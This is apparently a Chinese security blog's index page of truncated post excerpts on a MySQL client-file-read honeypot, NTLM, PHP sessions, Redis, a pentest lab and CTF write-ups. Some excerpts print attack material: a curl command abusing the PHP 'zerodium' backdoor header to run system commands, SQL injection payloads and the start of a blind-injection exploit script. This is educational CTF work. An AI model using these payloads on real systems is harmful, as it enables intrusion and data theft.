WHOAMI's Blog

[toc] 前言 在昨天（2021年4月11号），云舒大佬发了一个微博，疑似有人在在Freebuf上发了一篇带有蜜罐的文章，代码里面有MySQL帐号和密码。经云舒大佬连接测试后，发现这个MySQL服务器会读取连接它的客户端上的文件。 其实这个蜜罐利用的原理是一个很有趣的trick，原理在于MySQL服务端可以利用 LOAD DATA LOCAL 命令来读取MYSQL客户端的任意文件。这应该是一个很早以前就爆出来的漏洞，当年 TCTF2018 final 线下赛的比赛中，Dragon Sector 和 Cykor 就是用这个漏洞来非预期了 h4x0r’s club 这道题。 LOAD DATA INFILELOAD DATA INFILE 语句用于高速地从一个文本文件中读取行，并写入一个表中。文件名称必须为一个文字字符串。 LOAD DATA INFILE 是 SELECT ... INTO OUTFILE 的相对语句。把表的数据备份到文件使用SELECT ... INTO OUTFILE，从备份文件恢复表数据，使用 LOAD DATA INFILE。 标准示例： 12load dat ...

[toc] 前言由于感觉自己一直对一些 Windows 底层协议和原理了解的不够深入，最近一段时间恶补了一些基础的东西。 从这一篇文章开始，我们的内网渗透测试系列文章将更注重于底层协议和原理的学习，包括Windows 的常见认证体系与基础协议的概念和原理，以及他们存在的相关安全问题。本篇文章将给大家介绍 Windows NTLM 认证的相关内容，包括 NTLM 的概念与相关安全问题的介绍。 文中若有不当之处还请各位大佬多多点评 我的博客：https://whoamianony.top/ 公众号：WHOAMIAnony 在这之前，我们先了解一下 SSP 和 SSPI 这个概念。 SSPI 和 SSPSSPISSPI（Security Support Provider Interface），即 安全服务提供接口，这是 Windows 定义的一套接口，该接口定义了与安全有关的功能函数，包含但不限于： 身份验证机制 信息完整性 为其他协议提供的会话安全机制 SSPSSP（Security Service Provider），即 安全服务提供，他是 SSPI 的实现者，是对 SSPI ...

[toc] 能给我们Web狗整点阳间的嘛？？？ 签到 进入题目是一个博客，在里面测试了一顿后没有发现什么漏洞。这个签到太TMD阴间了，如果不放提示的话这道题铁铁的就是0解了。 PHP作为目前主流的web服务器语言，目前在互联网占有60%以上的市场份额，作为服务器软件对安全的影响极大。3.28日发现一例PHP源码投毒事件，疑似git.php.net服务器被攻破，黑客进行了两次后门代码的提交，具体细节官方还在调查，已经将代码服务器迁移到了更加安全的github。后门代码逻辑是显而易见的，很快被作者发现，并将代码回滚。 下面尝试这个后门的利用方法： 1curl -H "Accept-Encodeing: gzip,deflate" -H "User-Agentt: zerodiumsystem('cat /flag');" -v http://eci-2zecqhthq774p5l0ez1r.cloudeci1.ichunqiu.com/index.php 执行后得到如下： 12345678 ...

happysql进入题目，一个登录框： 使用万能密码测试，在登陆的位置存在sql注入。 输入： 12username: whoami"||0#password: 123456 报错： 输入： 12username: whoami"||1#password: 123456 登录成功： 我们可以根据这里进行POST型的sql盲注。 exp： 12345678910111213141516171819202122232425import requestsimport timeimport stringimport binasciiresult = ''url = "http://eci-2ze6t3je33wd120vx3kg.cloudeci1.ichunqiu.com/login.php"payload = 'username=admin1"/**/||case/**/when/**/(lpad(((select/**/group_concat(a.2)/**/from/**/(select/**/2 ...

[toc] baby_flask题目描述：你今天的幸运数字想不想知道，我来告诉你。 进入题目，是一个输出框。输入你的名字，然后随机返回给你一个幸运数字： 我们猜测 /getname?name= 处应该存在SSTI。 F12查看源代码发现提示过滤了一下字符： 123456blacklist</br> '.','[','\'','"','\\','+',':','_',</br> 'chr','pop','class','base','mro','init','globals','get',</br> 'eval','exec','os',&#x ...

[toc] little_trick进入题目，给出源码： 1234567891011<?php error_reporting(0); highlight_file(__FILE__); $nep = $_GET['nep']; $len = $_GET['len']; if(intval($len)<8 && strlen($nep)<13){ eval(substr($nep,0,$len)); }else{ die('too long!'); }?> 有以下几个限制： GET传入的len的数值不能大于8 GET传入的nep的长度不能超过13 绕过以上两个限制后才可以执行代码 eval(substr($nep,0,$len)); 。 PHP substr() 函数用于返回字符串的一部分，使用方法如下： 1substr(string,start,length) str ...

[toc] 基础知识PHP SESSION 的存储Session会话储存方式 PHP将session以文件的形式存储在服务器某个文件中，可以在php.ini里面设置session的存储位置session.save_path。 总结常见的php-session默认存放位置是很有必要的，因为在很多时候服务器都是按照默认设置来运行的， 默认路径 1234/var/lib/php/sess_PHPSESSID/var/lib/php/sessions/sess_PHPSESSID/tmp/sess_PHPSESSID/tmp/sessions/sess_PHPSESSID 如果没做过设置，session文件默认是在/var/lib/php/sessions/目录下，文件名是sess_加上你的sessionID字段。（没有权限）而一般情况下，phpmyadmin的session文件会设置在/tmp目录下，需要在php.ini里把session.auto_start置为1，把session.save_path目录设置为/tmp。 与 SESSION 有关的几个 PHP 选项 session ...

[toc] 前言假期马上结束了，闲暇之时我自己尝试着搭建了一个内网渗透的靶场。靶场是根据比较新的漏洞进行搭建的，质量自以为还可以。 目前此靶场已在vulnstack开源，下载链接：http://vulnstack.qiyuanxuetang.net/vuln/detail/9/ 文中若有不当之处还请各位大佬多多点评 我的博客：https://whoamianony.top/ 整个靶场的网络环境分为三层。从最初的信息收集、外网初探、攻入内网、搭建代理，横向移动，最终拿下域控。整个靶场所涉及的技术点大致如下： 信息收集： 端口扫描 端口服务识别 漏洞利用： 漏洞搜索与利用 Laravel Debug mode RCE（CVE-2021-3129）漏洞利用 Docker逃逸 通达OA v11.3 漏洞利用 Linux环境变量提权 Redis 未授权访问漏洞 Linux sudo权限提升（CVE-2021-3156）漏洞利用 SSH密钥利用 Windows NetLogon 域内权限提升（CVE-2020-1472）漏洞利用 MS14-068漏洞利用 构建隧道： 路由转发与代 ...

[toc] 前言这次比赛太难了，Web 四分之三都是零解。 [VNCTF 2021]Ez_game进入题目，是一个小游戏： 只有三条命，通过就给flag。查看源码，发现注释里写道，游戏有十关： 发现几个js，进入game.js，里面定义了一些游戏的属性。在PlayerData类中看到了人物的属性： 在InitLevel()方法中发现声明了一个player对象： 跟进Player()类： 该类中依然有人物的那些属性。 我们可以在控制台中修改player对象的属性，直接修改人物属性： 我们尝试修改这些属性： 1234player.health = 1000player.healthMax = 1000player.boomerands = 1000player.bigBoomerands = 1000 好了，现在我们就无敌了，那就玩吧。 玩到第三关的时候，发现死亡后重生时可以进入之前存档的一关。在 js 中找到疑似存档关卡的一个值 localStorage.kbap_warp： 设置 localStorage.kbap_warp 为 10，这样我们死亡后去进入存档，就可以 ...

[toc] Redis是什么？Redis是数据库的意思。Redis（Remote Dictionary Server )，即远程字典服务，是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库，并提供多种语言的API。 Redis是一个key-value存储系统。和Memcached类似，它支持存储的value类型相对更多，包括string(字符串)、list(链表)、set(集合)、zset(sorted set –有序集合)和hash（哈希类型）。这些数据类型都支持push/pop、add/remove及取交集并集和差集及更丰富的操作，而且这些操作都是原子性的。在此基础上，redis支持各种不同方式的排序。与memcached一样，为了保证效率，数据都是缓存在内存中。区别的是redis会周期性的把更新的数据写入磁盘或者把修改操作写入追加的记录文件，并且在此基础上实现了master-slave(主从)同步。 Redis运行在内存中但是可以持久化到磁盘，所以在对不同数据集进行高速读写时需要权衡内存，因为数据量不能大于硬件内存。在内存数据 ...